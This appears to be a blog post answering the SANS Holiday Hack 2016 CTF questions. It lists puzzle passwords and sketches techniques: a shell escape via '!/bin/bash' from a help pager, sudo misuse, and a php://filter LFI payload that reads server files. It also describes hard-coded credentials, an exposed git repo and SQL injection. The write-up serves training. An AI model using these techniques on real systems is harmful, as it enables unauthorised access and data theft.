Holiday Hack 2016 Q&A
1. What was the secret message in Santa’s tweets?
The secret message in Santa’s tweets was the password to the SantaGram_v4.2.zip. The
password was “bugbounty”.
2. What is inside the ZIP file distributed by Santa’s team?
The SantaGram_v4.2.apk file is inside the ZIP file distributed by Santa’s team.
3. What username and password are embedded in the APK file?
The username that is embedded in the APK file is “guest”. The password that is embedded
in the APK file is “busyreindeer78”.
4. What is the name of the audible component (audio file) in the SantaGram APK file?
The name of the audible component (audio file) in the SantaGram APK file is
discombobulatedaudio1.mp3.
5. What is the password for the “cranpi” account on the Cranberry Pi system?
yummycookies
6. How did you open each terminal door and where had the villain imprisoned Santa?
Each door had a terminal need it that had the password to each door. In order to get the password, the player
had to find passwords in each terminal.
had to find passwords in each terminal.
Elf House #2 Door: Two Password Halves Terminal
The following commands were used.
sudo -l -This command lists the users with the ability to use sudo, their commands, and
whether or not a password is required for these commands. There are two sudo users
visible.
sudo -u itchy strings out.pcap -this command changes the user to itchy for one command.
The command is the strings command. A password was not required for itchy to do sudo for this
command.
sudo -u itchy strings -a --encoding={s,l} out.pcap --this command changes the user to itchy
for one command, which is the strings command. A password was not required for itchy to
do sudo for this command. By default, strings only searches for certain encodings and
endianness. This command looks for single-7-bit-byte characters (ASCII, ISO 8859, etc.,
default) that are 16-bit little endian.
The password is santaslittlehelper.
Workshop Door: Evil Directory Structure
The following commands were used.
ls -ahlR /home/ - this command lists all directories, hidden directories, long list
format, and lists all subdirectories recursively in the /home/ directory.
cd - change the directory to the desired directory.
Method: List each directory individually and change into each directory using escape
characters as necessary. The escape characters are necessary because there are certain characters that are
interpreted as bash commands if the escape characters aren’t used. The escape characters are \ and “”.
interpreted as bash commands if the escape characters aren’t used. The escape characters are \ and “”.
The password is open_sesame.
Santa’s Office:
This door required one to have knowledge of War Games. Simply type exactly what
the character in the movie typed, word for word, select the selection he selected,
name the first city that he named, and it displays the key to the bookcase secret
door to the screen.
The password is LOOK AT THE PRETTY LIGHTS.
Workshop Door: Please Don’t “Wumpus"
Reverse engineer the wumpus game:
strings -n 10 wumpus
Wumpus has arguments: a:b:hp:r:t:
Run the wumpus game with each argument,looking for differences in functionality, to figure
out what they do.
a-adds/takes away arrows
b-amount of bats(pass number anything above 10 is too crowded)
t-amount of tunnels (must be at least two)
r-number of rooms
Cheat:
Change the number of rooms to the least amount of rooms, with most amount of tunnels, and shoot arrows
into each room that is adjacent to the player room.
into each room that is adjacent to the player room.
The password is WUMPUS IS MISUNDERSTOOD
Train:
There is a vulnerability in older versions of vi text editor. A shell can be spawned
from inside the text editor. *The HELP screen is actually ran with the less command. I didn't look at the
source.* Type HELP. Type “!/bin/bash” next to the colon at the bottom. Then ls
source.* Type HELP. Type “!/bin/bash” next to the colon at the bottom. Then ls
the directory and ./ActivateTrain. Press enter, and go back to 1978.
No Terminal Door:
One must solve the audio file puzzle in order to open this door. The files were opened individually in Audacity.
The tempo was manipulated first, so that the words could be understood. Then the pitch was manipulated.
Once the manipulation was complete, all of the files were put together. Dr. Who could be heard saying,
“Father Christmas, Santa Claus, or as I’ve always known him, Jeff.”
The tempo was manipulated first, so that the words could be understood. Then the pitch was manipulated.
Once the manipulation was complete, all of the files were put together. Dr. Who could be heard saying,
“Father Christmas, Santa Claus, or as I’ve always known him, Jeff.”
That phrase, including punctuation was the password for the door.
Where is Santa?
The Villain trapped poor Santa in the 1978 Dungeon For Errant Reindeer (DFER) room.
7. Once you get approval of given in-scope IP Addresses from Tom Hessman at the North Pole, attempt to remotely exploit each of the following targets:
The Mobile Analytics Server (via credentialed login access)
The Dungeon Game
The Debug Server
The Banner Ad Server
The Uncaught Exception Handler Server
The Mobile Analytics Server (post authentication)
For each of those six items, which vulnerabilities did you discover and exploit?
Mobile Analytics Server
The username and password were found hard-coded into the SantaGram apk when the apk was reverse
engineered. All one had to do was simply log on with those credentials.
engineered. All one had to do was simply log on with those credentials.
Dungeon Game
The developers left a debugger in the game that was used for testing purposes.
Debug Server
A method that should have been controlled server side was controlled from the app.
Banner Ad Server
The site is being ran by Meteor. All of the code for rendering the data is done client-side.
Unfortunately, sometimes too much data is sent to the client. That is the vulnerability in this server.
Ex Server
There is a LFI vulnerability in the code.
The server appends .php to the end of files, including to the crash dump files. When one uses the
ReadCrashDump, one could add a
ReadCrashDump, one could add a
php://filter/base64-encode/resource=<sensitive file> as the value in the crashdump json parameter.
The resource requested would be base64 encoded and displayed on the screen because the
php://filter/base64-encode/resource=exception wrapper is interpreted as php code. The resource,
exception.php, itself is not interpreted as code. All the attacker has to do is copy the base64
php://filter/base64-encode/resource=exception wrapper is interpreted as php code. The resource,
exception.php, itself is not interpreted as code. All the attacker has to do is copy the base64
output, decode it, then read it. There was sensitive information stored in the exception.php file. The sensitive
information was the location of discombobulated-audio-6-XyzE3N9YqKNH.mp3.
information was the location of discombobulated-audio-6-XyzE3N9YqKNH.mp3.
Analytics Server 2
A git repository was exposed to the Internet and world-readable. One could clone the git repository and get
the source code for each of the programs on the server. The authentication cookie was easily calculated once
one had the cryptography algorithm because the key was included in the cryptography algorithm. The
experimental Edit page was vulnerable to SQL injection via the query parameter. The database credentials
are included in db.php.
the source code for each of the programs on the server. The authentication cookie was easily calculated once
one had the cryptography algorithm because the key was included in the cryptography algorithm. The
experimental Edit page was vulnerable to SQL injection via the query parameter. The database credentials
are included in db.php.
8. What are the names of the audio files you discovered from each system above?
SantaGram_4.2.apk: discombobulatedaudio1.mp3
Analytics Server: Part One: discombobulatedaudio2.mp3
Dungeon Server: discombobulatedaudio3.mp3
Dev Server: debug-20161224235959-0.mp3
Ads Server: discombobulatedaudio5.mp3
Ex Server: discombobulated-audio-6-XyzE3N9YqKNH.mp3
Analytics Server: Part Two: discombobulatedaudio7.mp3
9. Who is the villain behind the nefarious plot?
Dr. Who
10. Why had the villain abducted Santa?
He wanted to change the timeline so that the 1978 Star Wars Holiday special never occurred.
No comments:
Post a Comment